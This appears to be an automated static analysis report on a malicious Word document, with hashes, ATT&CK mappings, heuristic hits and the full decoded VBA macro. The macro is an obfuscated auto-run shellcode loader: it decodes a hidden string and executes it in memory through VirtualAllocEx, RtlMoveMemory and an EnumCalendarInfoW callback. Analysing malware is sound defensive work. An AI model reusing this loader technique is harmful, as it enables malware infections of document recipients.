Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f78ab7aafc90ab1…

MALICIOUS

Office (OLE)

154.0 KB Created: 2016-11-07 12:55:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: aa27bb30995f9336a4f6aeff751a76cc SHA-1: 8ea29fb2dce8d6376694b9738c95ba06be457d34 SHA-256: 5f78ab7aafc90ab1d9f58c1e1c36ab284c668b82ac3e005f4cdfc4720a26c703
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. Heuristics indicate the use of VirtualAlloc and GetObject, suggesting memory allocation and object manipulation for payload execution. The ClamAV detection name 'Doc.Dropper.Agent-1820965' strongly implies a dropper functionality, where the macro likely downloads and executes a secondary payload. No specific family could be identified, but the behavior is consistent with a macro-based downloader.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-1820965 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1820965
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set wdApp = GetObject(, "Word.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim harmony As Long
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12521 bytes
SHA-256: 426b37a9119a79d46fd789aa516c632213ba43969f50c7d70546f32db2601930
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub upper()
    Dim InitialCaps As Range
     Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
        End:=ActiveDocument.Words(3).End)
    InitialCaps.Case = wdUpperCase
End Sub

Private Sub Document_Open()
Dim harmony As Long
Dim adlumia As Integer
freeway = "concordiam"
obsessivecompulsive = LCase$("MaN") & Right$("athensufacture", 8)
postal
clutter = 75
carboy = 93
If clutter + carboy < 10 Then
clutter = LCase$("cAse") & LCase$("HARDEN") & Mid("scorpionidaedsharping", 12, 2)
subscribed = subscribed
entellus = Right$("beastsbo", 2) & LCase$("oKcA") & LCase$("SE")
Else
nestling = nestling / 252
carboy = 88
End If
End Sub
Function halfadozen(eaglet)
Dim cotta As Variant
Dim sempiternal As Variant
Dim costerman As Long
formalin costerman, ByVal VarPtr(eaglet) + 8, 4
Dim roan As String
Dim vibration As Integer
Dim catabiosis As Long
intervallo = 0
outgate = -1
decrepit = 126 + 35 + 71 - 232
circumgyration = Abs(82.382)

mini = "amulet"

admiring = 4096
twothirds = cortically(ByVal outgate, ByVal decrepit, 7382, admiring, 64)
circumgyration = Int(225.87)

formalin catabiosis, ByVal VarPtr(twothirds) + 8, 4
circumgyration = Round(379.1297)

formalin ByVal catabiosis, ByVal costerman, 5538
slot = 9
While slot < 14
slot = slot + 1
subscribed = mini
nestling = Int(454.1064)
Wend

halfadozen = catabiosis
End Function
Sub postal()
Dim account As String
Dim gorge As Byte
Set butcherbird = stilted.nothofagus.BoundValue("Tab2")
wobble = butcherbird.ControlTipText
hereinafter = 126 + 7242
doggedness = Right(wobble, hereinafter)
basidiomycota = arado.hunc(doggedness)
gansu = 94
chorus = 62
If gansu + chorus < 30 Then
gansu = Right$("conspicioussen", 3) & Right$("asphyxiatesualism", 7)
mini = "tringa"
cavaliere = LCase$("Mu") & Left("sefulindisposed", 5)
Else
subscribed = mini
chorus = 17
End If

homegrown = "consul"
grapple = Right$("searchint", 3) & Mid("catkinertidinside", 7, 5) & Right$("bewareal", 2)
#If VBA6 And Win64 Then
Dim alps As String
Dim bead As arcturus
Dim germanspeaking As LongPtr
bead.elseifstatement = 119 + 60 - 179
Dim cameroon As Integer
#Else
Dim loathe As Integer
bead = 0
Dim defatigation As Long
Dim germanspeaking As Long
#End If
marblewood = 0
drumlin = "swollen"
topping = 94 - 60 + 4062
adventurousness = 8
While adventurousness < 12
adventurousness = adventurousness + 1
mini = mini
mini = subscribed
Wend

amsinckia = "shocking"
princesfeather = "curvilinear"
apothecaries = "reinstate"
hurlyburly = 8
While hurlyburly < 11
hurlyburly = hurlyburly + 1
circumgyration = nestling / 265
circumgyration = Round(291.843)
Wend

dimly = basidiomycota
snowdrift = "dracocephalum"
germanspeaking = halfadozen(dimly)
driblets = Mid("anthropophagouscoupitprop", 16, 3) & UCase$("nTERC") & UCase$("Heck")
einstein = "hyperglycemia"
#If VBA6 And Win64 Then
Dim stultiloquy As Variant
grassy = "pining"
efflorescence = "meaningless"
direction = "scatterbrained"
expressions = 37 + 66 - 42 + 1219
#ElseIf Win32 Then
diligent = "phonics"
pegology = "fesse"
diastrophism = 21 + 485
expressions = diastrophism + 3171

#End If
Dim fief As Variant
Dim akee As String
Dim smallscale As Long
smallscale = 2048
Dim letun As Long
letun = germanspeaking + expressions
Dim manufactory As Long
manufactory = 1
ajar = coward(letun, smallscale, manufactory, manufactory)
For lilliput = 37 To 57
suturing = 57
subscribed = subscribed
tensiometer = Left("brafflatus", 2) & UCase$("EATh")
tensiometer = UCase$("aL") & Mid("electroencephalogramtarmaisonnette", 21, 3)
Next lilliput

End Sub



Attribute VB_Name = "arado"
'I hope that I don't bore you while I whine about it
#If VBA6 And Win64 Then
'so if it all fails just throw it back in my face and bury me
Public Type arcturus
'as soon as I escape there's more stagnant bullsshit
elseifstatement As LongPtr
'I hope you won't be saddened while I cry about it
End Type
'I keep telling myself that there's something more
Public Declare PtrSafe Function atriplex Lib "user32" Alias "SetParent" (ByVal accountantship As LongPtr, ByVal bellwort As LongPtr,toots As LongPtr) As LongPtr
'I'd like to think there's more something more
Public Declare PtrSafe Function extroverted Lib "user32" Alias "GetUpdateRect" (hylactophryne As LongPtr, diapensiales As LongPtr,pine As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public  Declare PtrSafe Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal occidental As Any, ByVal jottings As Any, ByVal rove As Any, ByVal impassible As Any) As LongPtr
'I can't watch things further complicate
Public  Declare PtrSafe Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (precedent As Any, guardhouse As Any, ByVal notification As LongPtr)
'I'd like to think there's more something more
Public Declare PtrSafe Function absentmindedness Lib "user32" Alias "EndPaint" (albification As LongPtr,mediate As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function cortically Lib "kernel32" Alias "VirtualAllocEx" (biennial As LongPtr, iberomesornis As LongPtr, ByVal illicitness As LongPtr, ByVal midon As LongPtr, ByVal incontinence As LongPtr) As LongPtr
'on focusing destractions tear me open
Public Declare PtrSafe Function namtar Lib "kernel32" Alias "Sleep" (etymology As LongPtr)
'I keep telling myself that there's something more
Public Declare PtrSafe Function ladder Lib "user32" Alias "OpenClipboard" (alike As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit

'I hope you won't be saddened while I cry about it
#Else
'I hope you won't be saddened while I cry about it
Public Declare Function french Lib "user32" Alias "EndPaint" (nidicolous As Long, sapsago As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (bruder As Any, obreptitious As Any, ByVal ballad As Long)
'have mercy please God erase us
Public Declare Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal cymbid As Any, ByVal ambiversion As Any, ByVal mineralized As Any, ByVal flood As Any) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function diabetic Lib "user32" Alias "GetUpdateRect" (omnifarious As Long, droves As Long, chitchat As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function cortically Lib "kernel32" Alias "VirtualAllocEx" (anthologist As Long, calloused As Long, ByVal capillarity As Long, ByVal drapery As Long, ByVal chromosomal As Long) As Long
'all the thoughts in my head are constantly .. haunting me
Public Declare Function abc Lib "user32" Alias "OpenClipboard" (telegraphic As Long) As Boolean
'I'd like to think there's more something more
Public Declare Function motacilla Lib "user32" Alias "SetParent" (ByVal surrejoinder As Long, ByVal unaffected As Long, flimsily As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function brosmius Lib "kernel32" Alias "Sleep" (adjuvat As Long)
'I'm lost in this place it's such a waste

'I can't watch things further complicate
#End If
'so if it all fails just throw it back in my face and bury me
Function macleaya(facilitative, discredited)
macleaya = facilitative * discredited
End Function
Function isohel(fervor)
isohel = AscW(fervor)
End Function
Function incidentally(dicto, bos)
incidentally = dicto \ bos
End Function
Function annoyed(dabble, pisiform)
annoyed = dabble And pisiform
End Function
Function hunc(opportune) As String
circumgyration = circumgyration * 3

Dim despise(63) As Long
Dim abstinence(63) As Long
mini = "both"

Dim engorge() As Byte
Dim anaplasmosis(5525) As Byte
Dim whether(63) As Long
Dim stub As Long
Dim seines As Integer

Dim chalks(255) As Byte
Dim benzofuran As Long
Dim fearfully As Integer
Dim muove As String
Dim proturberance As Long
Dim weakkneed As Long
Dim tellurium As String

Dim eighteen As String

cemented = 53 + 70 + 3973
etat = 44 + 65236
Dim grip As String

Dim circumjacent As Long

highwayman = 16711680
dominantly = 123 - 11 + 143
streptolysin = 92 + 65444
marguerite = 126 - 62
agriculture = 63
cooperation = 262144
anachronism = 115 - 23 + 257956
Dim cimabue As Byte

tierce = 1 + 4031
adsorbed = 81 + 16514991
cacophony = 101 - 25 + 180
Dim favillous As Integer
Dim inguishable(7367) As Byte
curtained = 109 + 40 - 75 + 7294
For jaws = 1 To curtained
footlocker = Mid(opportune, jaws, 1)
tlingit = "chemiluminescence"
towhee = "design"
tensimeter = "amity"
alumina = isohel(footlocker)
inguishable(jaws - 1) = alumina
Next
Dim stratus As Long
wire = 79
nondiscrimination = 54
If wire + nondiscrimination < 15 Then
wire = LCase$("bA") & "rbec" & Right$("austromancyued", 3)
subscribed = mini
hectic = UCase$("wa") & Right$("apliterder", 4)
Else
circumgyration = Round(80.334)
nondiscrimination = 86
End If

danaea = 7367
brocaded = 35
For apt = 0 To danaea
inguishable(apt) = inguishable(apt) + 5
Next apt
cloudliness = 85
catching = 51
If cloudliness + catching < 32 Then
cloudliness = "me" & Mid("boundlessurtcuckoldom", 10, 3)
mini = "egotism"
amethyst = Right$("landgravebro", 3) & "nchos" & Left("pasmgly", 4)
Else
circumgyration = circumgyration And 422
catching = 101
End If

fearfully = 0
deific = 64 + 117 - 59
aftereffect = 255
For stub = 0 To aftereffect
If (stub >= 65) And (stub <= 90) Then
chalks(stub) = stub - 65
ElseIf (stub >= 97) And (stub <= 122) Then
chalks(stub) = stub - 71
ElseIf (stub >= 48) And (stub <= 57) Then
chalks(stub) = stub + 4
ElseIf stub = 43 Then
chalks(stub) = 62
ElseIf stub = 47 Then
chalks(stub) = 63
End If
Next stub
For stub = 0 To 63
despise(stub) = macleaya(stub, marguerite)
whether(stub) = macleaya(stub, cemented)
abstinence(stub) = macleaya(stub, cooperation)
Next stub
For bargaining = 30 To 61
astriction = 61
nestling = Fix(213.1021)
uti = UCase$("gaR") & Right$("inexorableambulla", 7)
uti = UCase$("DE") & UCase$("lIcTo")
Next bargaining

engorge = inguishable
aristarchy = 4
goasyouplease = 50
brotulidae = 74
If goasyouplease + brotulidae < 23 Then
goasyouplease = LCase$("de") & Right$("duckscolon", 5) & LCase$("IZATIOn")
circumgyration = Fix(469.712)
circumnavigate = LCase$("bA") & LCase$("RKeE") & UCase$("per")
Else
circumgyration = Fix(189.837)
brotulidae = 55
End If

divinities = 3
subscribed = mini

circumgyration = Round(462.418)

bichona = divinities + 1
painim = 113 + 101 - 212
For weakkneed = 0 To danaea
miraculous = engorge(weakkneed)
unoriginal = engorge(weakkneed + 2)
benzofuran = abstinence(chalks(miraculous)) _
 + whether(chalks(engorge(weakkneed + 1))) + despise(chalks(unoriginal)) + chalks(engorge(weakkneed + divinities))
stub = annoyed(benzofuran, highwayman)
anaplasmosis(proturberance) = incidentally(stub, streptolysin)
stub = annoyed(benzofuran, etat)
anaplasmosis(proturberance + 1) = incidentally(stub, cacophony)
anaplasmosis(proturberance + painim) = annoyed(benzofuran, dominantly)
proturberance = proturberance + painim + 1
weakkneed = weakkneed + 3
Next
hunc = anaplasmosis
End Function

Sub SelectSentence()
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    
    Set wdApp = GetObject(, "Word.Application")
    
    With wdApp.ActiveDocument
        If .Paragraphs.Count >= 3 Then
            Set wdRng = .Paragraphs(3).Range
            wdRng.Copy
        End If
    End With
    Worksheets("Sheet2").PasteSpecial
    Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub




Attribute VB_Name = "stilted"
Attribute VB_Base = "0{41F33EDB-7F26-4FE8-904E-14EDAF37791B}{3F8CCC1E-8E9B-4E9E-82A7-D367D9AD41E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False